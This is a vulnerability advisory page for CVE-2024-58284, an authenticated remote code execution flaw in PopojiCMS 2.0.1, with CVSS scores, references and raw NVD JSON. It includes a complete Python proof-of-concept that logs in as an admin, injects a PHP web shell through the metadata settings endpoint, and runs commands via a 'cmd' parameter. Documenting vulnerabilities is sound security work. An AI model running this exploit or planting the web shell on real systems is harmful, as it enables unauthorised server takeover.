CVE-2024-58284

Description

PopojiCMS 2.0.1 contains an authenticated remote command execution vulnerability that allows administrative users to inject malicious PHP code through the metadata settings endpoint. Attackers can log in and modify the meta content to create a web shell that executes arbitrary system commands through a GET parameter.

CVSS Details

CVSS Score

7.2

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:popojicms:popojicms:2.0.1:*:*:*:*:*:*:* - VULNERABLE

PopojiCMS < 2.0.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2024-58284 PopojiCMS 2.0.1 Authenticated RCE PoC
# Target: PopojiCMS <= 2.0.1
# Author: VulnCheck

import requests
import sys
from urllib.parse import urlencode

target_url = "http://target.com/po-admin/Component.php?string=setting"
payload = "<?php system($_GET['cmd']); ?>"

# Login to get admin session
def login(target, username, password):
    session = requests.Session()
    login_url = f"{target}/po-admin/login.php"
    data = {
        "username": username,
        "password": password
    }
    response = session.post(login_url, data=data)
    return session if "success" in response.text.lower() else None

# Inject malicious PHP code via metadata settings
def inject_payload(session, target, payload):
    inject_url = f"{target}/po-admin/Component.php?string=setting"
    data = {
        "content": payload,
        "meta_content": payload
    }
    response = session.post(inject_url, data=data)
    return response

# Execute command via webshell
def execute_command(target, cmd):
    webshell_url = f"{target}/po-admin/config/meta.php"
    params = {"cmd": cmd}
    response = requests.get(webshell_url, params=params)
    return response.text

if __name__ == "__main__":
    target = sys.argv[1]
    username = sys.argv[2]
    password = sys.argv[3]
    
    print("[*] Logging in as admin...")
    session = login(target, username, password)
    
    if session:
        print("[+] Login successful!")
        print("[*] Injecting malicious payload...")
        inject_payload(session, target, payload)
        print("[+] Payload injected! Webshell created at /po-admin/config/meta.php")
        print("[*] Example: python poc.py http://target.com admin password")
        print("[*] Execute command: curl 'http://target.com/po-admin/config/meta.php?cmd=whoami'")
    else:
        print("[-] Login failed!")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2024-58284
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2024-58284
[3] CVE Details https://www.cvedetails.com/cve/CVE-2024-58284/
[4] VulDB https://vuldb.com/cve/CVE-2024-58284
[5] https://github.com/PopojiCMS/PopojiCMS
[6] https://github.com/PopojiCMS/PopojiCMS/archive/refs/tags/v2.0.1.zip
[7] https://www.exploit-db.com/exploits/52022
[8] https://www.popojicms.org/
[9] https://www.vulncheck.com/advisories/popojicms-remote-command-execution-via-authenticated-metadata-settings
[10] https://github.com/PopojiCMS/PopojiCMS/archive/refs/tags/v2.0.1.zip

Raw JSON Data

JSON

{"cve": {"id": "CVE-2024-58284", "sourceIdentifier": "[email protected]", "published": "2025-12-10T22:16:20.420", "lastModified": "2025-12-19T17:42:24.517", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "PopojiCMS 2.0.1 contains an authenticated remote command execution vulnerability that allows administrative users to inject malicious PHP code through the metadata settings endpoint. Attackers can log in and modify the meta content to create a web shell that executes arbitrary system commands through a GET parameter."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-94"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:popojicms:popojicms:2.0.1:*:*:*:*:*:*:*", "matchCriteriaId": "2215DA94-615C-4B2C-BCC4-4497C233208C"}]}]}], "references": [{"url": "https://github.com/PopojiCMS/PopojiCMS", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/PopojiCMS/PopojiCMS/archive/refs/tags/v2.0.1.zip", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://www.exploit-db.com/exploits/52022", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://www.popojicms.org/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.vulncheck.com/advisories/popojicms-remote-command-execution-via-authenticated-metadata-settings", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://github.com/PopojiCMS/PopojiCMS/archive/refs/tags/v2.0.1.zip", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Release Notes"]}]}}